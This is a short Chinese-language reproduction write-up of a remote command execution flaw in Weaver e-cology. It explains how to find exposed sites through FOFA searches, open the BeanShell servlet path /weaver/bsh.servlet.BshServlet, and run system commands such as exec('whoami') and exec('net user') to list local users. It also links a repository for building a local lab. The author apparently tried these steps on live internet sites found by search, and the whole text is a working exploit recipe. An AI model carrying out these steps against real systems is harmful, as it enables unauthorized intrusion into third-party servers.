復現過程:
直接使用FOFA搜索語法搜索,找了好久才找到含有漏洞的站點。
在根目錄后面輸入漏洞路徑: /weaver/bsh.servlet.BshServlet
進入BeanShell操作頁面
在Script中輸入語句,結果會在Script Output中輸出。
輸入exec("whoami") 結果如圖,可知這個系統是windows系統,查看/etc/passwd就不用想了
使用exec("net user")查看本機用戶。
如果想本地搭建環境復現可見https://github.com/jas502n/e-cology